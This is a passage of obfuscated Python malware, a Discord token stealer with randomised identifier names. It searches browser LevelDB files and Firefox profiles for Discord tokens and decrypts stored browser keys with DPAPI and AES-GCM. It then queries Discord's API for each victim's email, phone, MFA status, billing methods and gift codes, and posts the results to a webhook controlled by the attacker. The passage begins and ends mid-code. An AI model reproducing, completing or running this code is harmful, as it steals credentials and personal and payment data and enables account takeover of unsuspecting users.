                                        VJRRLCSKUWLQCUTIQRLRJKIVYHHNNVWUKCLQYUOTHASEKTWEQX.append(MGBFEVRMTLLPBSSMDBEESVSMBWSTDXKCOHQPCAQNCWQHHCDTBHVFZJGPAXLAVYKMIFKQXUZKCZDCIPZVOCZ)
                                        TKQKIQMJYIZXGVCRZXSLPULYEJUIQNMOIOFBAYRKGYOXDQFYKOKU[VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU] = (BRPFFQDIEXDNEZDNTZQJYXPROBGDNXKAKBJEJVOQUQUEHFJFRXRAEGUAIURVRCVPQQKTZJHXVEPIXETFSJYRYCTAM, f"{NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH}\\{v4r_file_name}")
            else:
                for v4r_file_name in os.listdir(NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU in re.findall(JJEAHYZSHXJOJQEIKERRVPEAQGWYYDSXYIRFXKSRYPCSDBFHXYFSGIRKAKXCMNSSOWQGOZSHHIVTAOAGYSWPUUDLHDGK, v4r_line.strip()):
                                if FAYBTNKWANOIPMMXHJWMQPTVMEUXSLFNSWQLWDBSAUZUTNDWWAWHCKUYWQDRFOUNGMZENGXIICHZNMWPXPQG(VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU, XJWRSIPAWOHAXMJIEJTJUYOUODNLXTZGKOQJMRHWERRZGOWZMFFMMVTDRQUWXFHAZCFMTMHLUKRMRSGVGVTYVAHC):
                                    MGBFEVRMTLLPBSSMDBEESVSMBWSTDXKCOHQPCAQNCWQHHCDTBHVFZJGPAXLAVYKMIFKQXUZKCZDCIPZVOCZ = requests.get(XJWRSIPAWOHAXMJIEJTJUYOUODNLXTZGKOQJMRHWERRZGOWZMFFMMVTDRQUWXFHAZCFMTMHLUKRMRSGVGVTYVAHC, headers={'Authorization': VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU}).json()['id']
                                    if MGBFEVRMTLLPBSSMDBEESVSMBWSTDXKCOHQPCAQNCWQHHCDTBHVFZJGPAXLAVYKMIFKQXUZKCZDCIPZVOCZ not in VJRRLCSKUWLQCUTIQRLRJKIVYHHNNVWUKCLQYUOTHASEKTWEQX:
                                        HYHKKFGSWUUQKSVXUUDSAFXFGYCCGCGIZTAMYALSQQWRCENABXEWTUECWYFTPOTGHCTJQKRFTTTXG.append(VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU)
                                        VJRRLCSKUWLQCUTIQRLRJKIVYHHNNVWUKCLQYUOTHASEKTWEQX.append(MGBFEVRMTLLPBSSMDBEESVSMBWSTDXKCOHQPCAQNCWQHHCDTBHVFZJGPAXLAVYKMIFKQXUZKCZDCIPZVOCZ)
                                        TKQKIQMJYIZXGVCRZXSLPULYEJUIQNMOIOFBAYRKGYOXDQFYKOKU[VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU] = (BRPFFQDIEXDNEZDNTZQJYXPROBGDNXKAKBJEJVOQUQUEHFJFRXRAEGUAIURVRCVPQQKTZJHXVEPIXETFSJYRYCTAM, f"{NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH}\\{v4r_file_name}")

        if os.path.exists(UFZPKGXXDDSRPTQWDCTBJGPPTRLCFFUSRJUYSTNCLGLACKRNOVHMNGNTMPHFKBTSWXAIHBIAVGPYKUYEDDVAJUQHSYHNAY + "\\Mozilla\\Firefox\\Profiles"):
            for NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH, _, v4r_files in os.walk(UFZPKGXXDDSRPTQWDCTBJGPPTRLCFFUSRJUYSTNCLGLACKRNOVHMNGNTMPHFKBTSWXAIHBIAVGPYKUYEDDVAJUQHSYHNAY + "\\Mozilla\\Firefox\\Profiles"):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(f'{NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH}\\{v4r__file}', errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU in re.findall(JJEAHYZSHXJOJQEIKERRVPEAQGWYYDSXYIRFXKSRYPCSDBFHXYFSGIRKAKXCMNSSOWQGOZSHHIVTAOAGYSWPUUDLHDGK, v4r_line.strip()):
                                    if FAYBTNKWANOIPMMXHJWMQPTVMEUXSLFNSWQLWDBSAUZUTNDWWAWHCKUYWQDRFOUNGMZENGXIICHZNMWPXPQG(VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU, XJWRSIPAWOHAXMJIEJTJUYOUODNLXTZGKOQJMRHWERRZGOWZMFFMMVTDRQUWXFHAZCFMTMHLUKRMRSGVGVTYVAHC):
                                        MGBFEVRMTLLPBSSMDBEESVSMBWSTDXKCOHQPCAQNCWQHHCDTBHVFZJGPAXLAVYKMIFKQXUZKCZDCIPZVOCZ = requests.get(XJWRSIPAWOHAXMJIEJTJUYOUODNLXTZGKOQJMRHWERRZGOWZMFFMMVTDRQUWXFHAZCFMTMHLUKRMRSGVGVTYVAHC, headers={'Authorization': VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU}).json()['id']
                                        if MGBFEVRMTLLPBSSMDBEESVSMBWSTDXKCOHQPCAQNCWQHHCDTBHVFZJGPAXLAVYKMIFKQXUZKCZDCIPZVOCZ not in VJRRLCSKUWLQCUTIQRLRJKIVYHHNNVWUKCLQYUOTHASEKTWEQX:
                                            HYHKKFGSWUUQKSVXUUDSAFXFGYCCGCGIZTAMYALSQQWRCENABXEWTUECWYFTPOTGHCTJQKRFTTTXG.append(VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU)
                                            VJRRLCSKUWLQCUTIQRLRJKIVYHHNNVWUKCLQYUOTHASEKTWEQX.append(MGBFEVRMTLLPBSSMDBEESVSMBWSTDXKCOHQPCAQNCWQHHCDTBHVFZJGPAXLAVYKMIFKQXUZKCZDCIPZVOCZ)
                                            TKQKIQMJYIZXGVCRZXSLPULYEJUIQNMOIOFBAYRKGYOXDQFYKOKU[VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU] = ('Firefox', f"{NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH}\\{v4r__file}")
        return HYHKKFGSWUUQKSVXUUDSAFXFGYCCGCGIZTAMYALSQQWRCENABXEWTUECWYFTPOTGHCTJQKRFTTTXG, TKQKIQMJYIZXGVCRZXSLPULYEJUIQNMOIOFBAYRKGYOXDQFYKOKU

    def FAYBTNKWANOIPMMXHJWMQPTVMEUXSLFNSWQLWDBSAUZUTNDWWAWHCKUYWQDRFOUNGMZENGXIICHZNMWPXPQG(VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU, XJWRSIPAWOHAXMJIEJTJUYOUODNLXTZGKOQJMRHWERRZGOWZMFFMMVTDRQUWXFHAZCFMTMHLUKRMRSGVGVTYVAHC):
        return requests.get(XJWRSIPAWOHAXMJIEJTJUYOUODNLXTZGKOQJMRHWERRZGOWZMFFMMVTDRQUWXFHAZCFMTMHLUKRMRSGVGVTYVAHC, headers={'Authorization': VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU}).status_code == 200

    def IFHYRBRBYXXZSXCRCJRUXRQHFICHOEMTKMYZUPMOXNGYRJDXWFQSUSTBCJXPLIATCWECDFAAZPYPQEYPTVal(LJJHAPEQADUNFLXTWZESGEYOIZRIHCESNFFYNRLDUWUZFEQWTC, IDOHZASVKZBAOKQGHLYDCWWHMCCZYJSMSGDMYVTEBLDDDNJLKIQPABBOZOJOMAKJNSTTUSPIQQEYE):
        BQPDUVTNUMAUNCOZFEVQIQUANGGVCEGVFNIACOZIYGNESCGXVNDQIVJZCLTCHPNXWYFUUZQZXAHVXKVTODIUACLAK = LJJHAPEQADUNFLXTWZESGEYOIZRIHCESNFFYNRLDUWUZFEQWTC[3:15]
        SHBCXLBJOWAXZTTPPOYTQPERRSHGSMDVHLUDYHQDPZRAZBDQKXLAFYRVFRBWTVLQLDYOSFIZGLIQKYFZITXFTJHXUKTDNVBUWM = LJJHAPEQADUNFLXTWZESGEYOIZRIHCESNFFYNRLDUWUZFEQWTC[15:]
        FLOEYNGGFSNDCONICTOJZSFZTGCPWQACMJBVMEKCYAEUMAXHIBHFHWMUGUYRSDWGFIJSJFCWPRCWSMS = AES.new(IDOHZASVKZBAOKQGHLYDCWWHMCCZYJSMSGDMYVTEBLDDDNJLKIQPABBOZOJOMAKJNSTTUSPIQQEYE, AES.MODE_GCM, BQPDUVTNUMAUNCOZFEVQIQUANGGVCEGVFNIACOZIYGNESCGXVNDQIVJZCLTCHPNXWYFUUZQZXAHVXKVTODIUACLAK)
        return FLOEYNGGFSNDCONICTOJZSFZTGCPWQACMJBVMEKCYAEUMAXHIBHFHWMUGUYRSDWGFIJSJFCWPRCWSMS.decrypt(SHBCXLBJOWAXZTTPPOYTQPERRSHGSMDVHLUDYHQDPZRAZBDQKXLAFYRVFRBWTVLQLDYOSFIZGLIQKYFZITXFTJHXUKTDNVBUWM)[:-16].decode()

    def WUUWAOEXTKSDOUKCJWOJIWBXWLPVVAEEVSVCCORVXRGFSPEZSMSSHCCRWZNOQTXDBGDLOVLMFSKRVB(NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH):
        if not os.path.exists(NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH):
            return None
        with open(NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH, "r", encoding="utf-8") as v4r_f:
            UFHJTBQSYYPNGWXUTTYFYPMERJEFPVUKTJSJBHJJDCDSOZHBLB = json.load(v4r_f)
        IDOHZASVKZBAOKQGHLYDCWWHMCCZYJSMSGDMYVTEBLDDDNJLKIQPABBOZOJOMAKJNSTTUSPIQQEYE = base64.b64decode(UFHJTBQSYYPNGWXUTTYFYPMERJEFPVUKTJSJBHJJDCDSOZHBLB["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(IDOHZASVKZBAOKQGHLYDCWWHMCCZYJSMSGDMYVTEBLDDDNJLKIQPABBOZOJOMAKJNSTTUSPIQQEYE, None, None, None, 0)[1]

    HYHKKFGSWUUQKSVXUUDSAFXFGYCCGCGIZTAMYALSQQWRCENABXEWTUECWYFTPOTGHCTJQKRFTTTXG, TKQKIQMJYIZXGVCRZXSLPULYEJUIQNMOIOFBAYRKGYOXDQFYKOKU = ILCKXZJUMAEKATVVHJIUCNFVEGBDCMMEHKYYTOCPZTYVQXIJKZXDPQIWHWRFDUKNSNIIPOINVFXLQGPYCEZVZYCEVEQPQNQUX()
    ODEFLRZOMMYJQBKBZAFWCMMFFJJQNHABPWHPSRAYQXTZZQYOYTDSXIHKMDCBLELQPTWUSJ = SyncWebhook.from_url(JWYVDZHULQYWOKJLEHQDUESUOVMLMYRUDBDTLOWPXWFUXKESODFHFUQJVZIVWAEAIQFRPAONONS)

    if not HYHKKFGSWUUQKSVXUUDSAFXFGYCCGCGIZTAMYALSQQWRCENABXEWTUECWYFTPOTGHCTJQKRFTTTXG:
        HRGSHNKUSTFGIHGBSHSZQTXYTJRACSMVVMQKMBYSVMTBCLSXQQASA(
            JWYVDZHULQYWOKJLEHQDUESUOVMLMYRUDBDTLOWPXWFUXKESODFHFUQJVZIVWAEAIQFRPAONONS, 
            title=f'Discord Token {TGYOUIFMOWKYZIOUPHVPRESMWIAADIZAXDPGRUJRHHQVDLSQEWTQDIHYMZBIQSQLOQBAVYWWLBBOWBNN}:', 
            description=f"No discord tokens found."
        )
        return
    
    for VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU_d15c0rd in HYHKKFGSWUUQKSVXUUDSAFXFGYCCGCGIZTAMYALSQQWRCENABXEWTUECWYFTPOTGHCTJQKRFTTTXG:
        EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU_d15c0rd}).json()

        ZWYJZRAFJEZXIMHJOUHDFSYICIMTUSRMUMUIGZZNLMOAHUKDIYMVMQJIDRJSURWAKT = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('username', "None") + '#' + EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('discriminator', "None")
        SJHADBGJHDJVXGYXPZZHNRJUCRCVKNWDLTDWANYNNOVYHPKTVJJWCXWSUOORPE = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('global_name', "None")
        XVMJCPXCIQTZUNDFMFOEMFRZNPNHIBRMSSPULGFIMLNYPUUXQYGZ = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('id', "None")
        POUZTJVGJSHWCCTJDYAUQTPINSUDTXNUCUVWNAZOPYRKUNHFCWULCVPYBBQJQHFBDBMALQANNXJNXVWJSBCZD = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('email', "None")
        COTHFYUSRBQOXVWJHMRVSOJUKYJCVEBCSBQGZVJIWTAELLAEVLGFUSKKAOSAVXDMYSMLNDY = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('verified', "None")
        FERMVYAHFANTWKEYHZSEXWKMGCCTRWOHUSEUSDSHZREYJLWVAGETQYORYLGDFMYKYMRCZBRXQ = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('phone', "None")
        UWEZLPILYJKVJPLKATXGQMQPNQTDHWXJJQPDTJBYAJKYFOLNNLHDZPTEBCAYCFDYMUJSVBKMPMQHQQQ = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('locale', "None")
        SYRZJENOIIHBQAFOCFUZUSRWFPYPQXUDZCMHLXIQTZNWDOURNITTSZLZF = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('mfa_enabled', "None")

        try:
            if EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('premium_type', 'None') == 0:
                FDCKJEUANNXGDRKYWKZHQKHKAJFSRGHTSTBGOBIYPOLBXCDQKXTSWQAAQNLKODFVPMAUESEQPYKYMPECMFCBX = 'False'
            elif EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('premium_type', 'None') == 1:
                FDCKJEUANNXGDRKYWKZHQKHKAJFSRGHTSTBGOBIYPOLBXCDQKXTSWQAAQNLKODFVPMAUESEQPYKYMPECMFCBX = 'Nitro Classic'
            elif EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('premium_type', 'None') == 2:
                FDCKJEUANNXGDRKYWKZHQKHKAJFSRGHTSTBGOBIYPOLBXCDQKXTSWQAAQNLKODFVPMAUESEQPYKYMPECMFCBX = 'Nitro Boosts'
            elif EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('premium_type', 'None') == 3:
                FDCKJEUANNXGDRKYWKZHQKHKAJFSRGHTSTBGOBIYPOLBXCDQKXTSWQAAQNLKODFVPMAUESEQPYKYMPECMFCBX = 'Nitro Basic'
            else:
                FDCKJEUANNXGDRKYWKZHQKHKAJFSRGHTSTBGOBIYPOLBXCDQKXTSWQAAQNLKODFVPMAUESEQPYKYMPECMFCBX = 'False'
        except:
            FDCKJEUANNXGDRKYWKZHQKHKAJFSRGHTSTBGOBIYPOLBXCDQKXTSWQAAQNLKODFVPMAUESEQPYKYMPECMFCBX = "None"

        try: 
            OTAPWGJAQSBYRDAEBDPSQWZJGXEUTJQPEYFFJAKCKBVSHXCIUFOUYQATIT = f"https://cdn.discordapp.com/avatars/{XVMJCPXCIQTZUNDFMFOEMFRZNPNHIBRMSSPULGFIMLNYPUUXQYGZ}/{EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{XVMJCPXCIQTZUNDFMFOEMFRZNPNHIBRMSSPULGFIMLNYPUUXQYGZ}/{EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{XVMJCPXCIQTZUNDFMFOEMFRZNPNHIBRMSSPULGFIMLNYPUUXQYGZ}/{EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA['avatar']}.png"
        except: 
            OTAPWGJAQSBYRDAEBDPSQWZJGXEUTJQPEYFFJAKCKBVSHXCIUFOUYQATIT = COASRMXSAMPXHOXYUWRRBRLZMBUSVLSKJRFSVWDYBTJCPHVTVJCF

        try:
            FBWYUSUVSIQZKCIOJSIWPIKVZKRAAOPGCSXOBYVOJBTYKXNWOKNSHUJAEOWFPGBBKHUXR = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU_d15c0rd}).json()
            if FBWYUSUVSIQZKCIOJSIWPIKVZKRAAOPGCSXOBYVOJBTYKXNWOKNSHUJAEOWFPGBBKHUXR:
                CQYIPRDOQDGMRKUCFOBQKSCDCLTCPXZVXIAREEGZZFQGQONNCMILEKIGBRDDMXRYGHYYLYIHVZ = []

                for v4r_method in FBWYUSUVSIQZKCIOJSIWPIKVZKRAAOPGCSXOBYVOJBTYKXNWOKNSHUJAEOWFPGBBKHUXR:
                    if v4r_method['type'] == 1:
                        CQYIPRDOQDGMRKUCFOBQKSCDCLTCPXZVXIAREEGZZFQGQONNCMILEKIGBRDDMXRYGHYYLYIHVZ.append('CB')
                    elif v4r_method['type'] == 2:
                        CQYIPRDOQDGMRKUCFOBQKSCDCLTCPXZVXIAREEGZZFQGQONNCMILEKIGBRDDMXRYGHYYLYIHVZ.append("Paypal")
                    else:
                        CQYIPRDOQDGMRKUCFOBQKSCDCLTCPXZVXIAREEGZZFQGQONNCMILEKIGBRDDMXRYGHYYLYIHVZ.append('Other')
                CQYIPRDOQDGMRKUCFOBQKSCDCLTCPXZVXIAREEGZZFQGQONNCMILEKIGBRDDMXRYGHYYLYIHVZ = ' / '.join(CQYIPRDOQDGMRKUCFOBQKSCDCLTCPXZVXIAREEGZZFQGQONNCMILEKIGBRDDMXRYGHYYLYIHVZ)
            else:
                CQYIPRDOQDGMRKUCFOBQKSCDCLTCPXZVXIAREEGZZFQGQONNCMILEKIGBRDDMXRYGHYYLYIHVZ = "None"
        except:
            CQYIPRDOQDGMRKUCFOBQKSCDCLTCPXZVXIAREEGZZFQGQONNCMILEKIGBRDDMXRYGHYYLYIHVZ = "None"

        try:
            XTKHKUKLZUIHVNMCEVLWGYBSIBPGNHCBIUWNGZUWJMHJCVKVEKTTHYFBZHQXKEEJ = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU_d15c0rd}).json()
            if XTKHKUKLZUIHVNMCEVLWGYBSIBPGNHCBIUWNGZUWJMHJCVKVEKTTHYFBZHQXKEEJ:
                XACNLZHYNBGAAKQPWDQCDEJKGDAGIYHOXNEMQRAMKRNJGKRZNIAI = []
                for BPQFUDZTLAFTWMAQUOCJDUFRLVSUIISDJTLKXHIQOFYOQSMFUSBIOVIIHLXUMSDVQZPNNVLRJBSOIAEXVPCAPMYUJEBPWTJSK in XTKHKUKLZUIHVNMCEVLWGYBSIBPGNHCBIUWNGZUWJMHJCVKVEKTTHYFBZHQXKEEJ:
                    BRPFFQDIEXDNEZDNTZQJYXPROBGDNXKAKBJEJVOQUQUEHFJFRXRAEGUAIURVRCVPQQKTZJHXVEPIXETFSJYRYCTAM = BPQFUDZTLAFTWMAQUOCJDUFRLVSUIISDJTLKXHIQOFYOQSMFUSBIOVIIHLXUMSDVQZPNNVLRJBSOIAEXVPCAPMYUJEBPWTJSK['promotion']['outbound_title']
                    BPQFUDZTLAFTWMAQUOCJDUFRLVSUIISDJTLKXHIQOFYOQSMFUSBIOVIIHLXUMSDVQZPNNVLRJBSOIAEXVPCAPMYUJEBPWTJSK = BPQFUDZTLAFTWMAQUOCJDUFRLVSUIISDJTLKXHIQOFYOQSMFUSBIOVIIHLXUMSDVQZPNNVLRJBSOIAEXVPCAPMYUJEBPWTJSK['code']
                    CUTGRHQUWPGRLIOERZNOZZXRQROIKXMATRRUUWLBVHYURHHHNXLQOQTWQSQSALCTLTCUVXYDXZLQMQCUSPBMFPFV = f"Gift: {BRPFFQDIEXDNEZDNTZQJYXPROBGDNXKAKBJEJVOQUQUEHFJFRXRAEGUAIURVRCVPQQKTZJHXVEPIXETFSJYRYCTAM}\nCode: {BPQFUDZTLAFTWMAQUOCJDUFRLVSUIISDJTLKXHIQOFYOQSMFUSBIOVIIHLXUMSDVQZPNNVLRJBSOIAEXVPCAPMYUJEBPWTJSK}"
                    if len('\n\n'.join(BPQFUDZTLAFTWMAQUOCJDUFRLVSUIISDJTLKXHIQOFYOQSMFUSBIOVIIHLXUMSDVQZPNNVLRJBSOIAEXVPCAPMYUJEBPWTJSK)) + len(CUTGRHQUWPGRLIOERZNOZZXRQROIKXMATRRUUWLBVHYURHHHNXLQOQTWQSQSALCTLTCUVXYDXZLQMQCUSPBMFPFV) >= 1024:
                        break
                    XACNLZHYNBGAAKQPWDQCDEJKGDAGIYHOXNEMQRAMKRNJGKRZNIAI.append(CUTGRHQUWPGRLIOERZNOZZXRQROIKXMATRRUUWLBVHYURHHHNXLQOQTWQSQSALCTLTCUVXYDXZLQMQCUSPBMFPFV)
                if len(XACNLZHYNBGAAKQPWDQCDEJKGDAGIYHOXNEMQRAMKRNJGKRZNIAI) > 0:
                    BPQFUDZTLAFTWMAQUOCJDUFRLVSUIISDJTLKXHIQOFYOQSMFUSBIOVIIHLXUMSDVQZPNNVLRJBSOIAEXVPCAPMYUJEBPWTJSK = '\n\n'.join(XACNLZHYNBGAAKQPWDQCDEJKGDAGIYHOXNEMQRAMKRNJGKRZNIAI)
                else:
                    BPQFUDZTLAFTWMAQUOCJDUFRLVSUIISDJTLKXHIQOFYOQSMFUSBIOVIIHLXUMSDVQZPNNVLRJBSOIAEXVPCAPMYUJEBPWTJSK = "None"
            else:
                BPQFUDZTLAFTWMAQUOCJDUFRLVSUIISDJTLKXHIQOFYOQSMFUSBIOVIIHLXUMSDVQZPNNVLRJBSOIAEXVPCAPMYUJEBPWTJSK = "None"
        except:
            BPQFUDZTLAFTWMAQUOCJDUFRLVSUIISDJTLKXHIQOFYOQSMFUSBIOVIIHLXUMSDVQZPNNVLRJBSOIAEXVPCAPMYUJEBPWTJSK = "None"
    
        v4r_software_name, NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH = TKQKIQMJYIZXGVCRZXSLPULYEJUIQNMOIOFBAYRKGYOXDQFYKOKU.get(VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU_d15c0rd, ("Unknown Software", "Unknown location"))

        embed = Embed(title=f'Discord Token {TGYOUIFMOWKYZIOUPHVPRESMWIAADIZAXDPGRUJRHHQVDLSQEWTQDIHYMZBIQSQLOQBAVYWWLBBOWBNN}:', color=RMJJMOUXTBZJYWBWEOIPOWSROASXCPITCQRFHZCMWGHOCMVPRTUVL)      
        embed.add_field(name=":file_folder: Path:", value=f"```{NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH}```", inline=True)
        embed.add_field(name=":globe_with_meridians: Token:", value=f"```{VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU_d15c0rd}```", inline=True)
        embed.add_field(name=":package: Software:", value=f"```{v4r_software_name}```", inline=True)
        embed.add_field(name=":bust_in_silhouette: Username:", value=f"```{ZWYJZRAFJEZXIMHJOUHDFSYICIMTUSRMUMUIGZZNLMOAHUKDIYMVMQJIDRJSURWAKT}```", inline=True)
        embed.add_field(name=":bust_in_silhouette: Display Name:", value=f"```{SJHADBGJHDJVXGYXPZZHNRJUCRCVKNWDLTDWANYNNOVYHPKTVJJWCXWSUOORPE}```", inline=True)
        embed.add_field(name=":robot: Id:", value=f"```{XVMJCPXCIQTZUNDFMFOEMFRZNPNHIBRMSSPULGFIMLNYPUUXQYGZ}```", inline=True)
        embed.add_field(name=":e_mail: Email:", value=f"```{POUZTJVGJSHWCCTJDYAUQTPINSUDTXNUCUVWNAZOPYRKUNHFCWULCVPYBBQJQHFBDBMALQANNXJNXVWJSBCZD}```", inline=True)
        embed.add_field(name=":white_check_mark: Email Verified:", value=f"```{COTHFYUSRBQOXVWJHMRVSOJUKYJCVEBCSBQGZVJIWTAELLAEVLGFUSKKAOSAVXDMYSMLNDY}```", inline=True)
        embed.add_field(name=":telephone_receiver: Phone:", value=f"```{FERMVYAHFANTWKEYHZSEXWKMGCCTRWOHUSEUSDSHZREYJLWVAGETQYORYLGDFMYKYMRCZBRXQ}```", inline=True)   
        embed.add_field(name=":rocket: Nitro:", value=f"```{FDCKJEUANNXGDRKYWKZHQKHKAJFSRGHTSTBGOBIYPOLBXCDQKXTSWQAAQNLKODFVPMAUESEQPYKYMPECMFCBX}```", inline=True)
        embed.add_field(name=":earth_africa: Language:", value=f"```{UWEZLPILYJKVJPLKATXGQMQPNQTDHWXJJQPDTJBYAJKYFOLNNLHDZPTEBCAYCFDYMUJSVBKMPMQHQQQ}```", inline=True)
        embed.add_field(name=":moneybag: Billing:", value=f"```{CQYIPRDOQDGMRKUCFOBQKSCDCLTCPXZVXIAREEGZZFQGQONNCMILEKIGBRDDMXRYGHYYLYIHVZ}```", inline=True)
        embed.add_field(name=":gift: Gift Code:", value=f"```{BPQFUDZTLAFTWMAQUOCJDUFRLVSUIISDJTLKXHIQOFYOQSMFUSBIOVIIHLXUMSDVQZPNNVLRJBSOIAEXVPCAPMYUJEBPWTJSK}```", inline=True)
        embed.add_field(name=":lock: Multi-Factor Authentication:", value=f"```{SYRZJENOIIHBQAFOCFUZUSRWFPYPQXUDZCMHLXIQTZNWDOURNITTSZLZF}```", inline=True)
        embed.add_field(name=":frame_photo: Profile Picture:", value=f"", inline=False)
        embed.set_image(url=OTAPWGJAQSBYRDAEBDPSQWZJGXEUTJQPEYFFJAKCKBVSHXCIUFOUYQATIT)
        embed.set_footer(text=ILDRTXVCRNWREWBTBHGYUDNLNATSSHGVKKJGTOVFIEONBRWNVPZQMFZAARZWDVWYGASSOCMHQCWHDNBGKNCZIID, icon_url=COASRMXSAMPXHOXYUWRRBRLZMBUSVLSKJRFSVWDYBTJCPHVTVJCF)
